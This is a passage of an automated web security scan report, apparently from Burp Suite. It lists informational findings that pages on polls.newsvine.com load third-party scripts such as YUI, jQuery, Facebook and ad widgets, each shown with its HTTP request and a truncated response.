<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.554. http://www.polls.newsvine.com/_vine/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_vine/search HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:35 GMT
Content-Length: 17471
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.555. http://www.polls.newsvine.com/arts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /arts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /arts HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinearts&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.556. http://www.polls.newsvine.com/business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinebusiness&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.557. http://www.polls.newsvine.com/education

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /education

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /education HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineeducation&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.558. http://www.polls.newsvine.com/entertainment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /entertainment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineentertainment&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.559. http://www.polls.newsvine.com/environment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /environment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /environment HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineenvironment&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.560. http://www.polls.newsvine.com/fashion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /fashion

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fashion HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinefashion&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.561. http://www.polls.newsvine.com/health

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /health

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /health HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinehealth&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.562. http://www.polls.newsvine.com/history

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /history

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /history HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinehistory&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.563. http://www.polls.newsvine.com/home-garden

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /home-garden

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home-garden HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinehomegarden&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.564. http://www.polls.newsvine.com/not-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /not-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /not-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinenotnews&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.565. http://www.polls.newsvine.com/odd-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /odd-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /odd-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58614

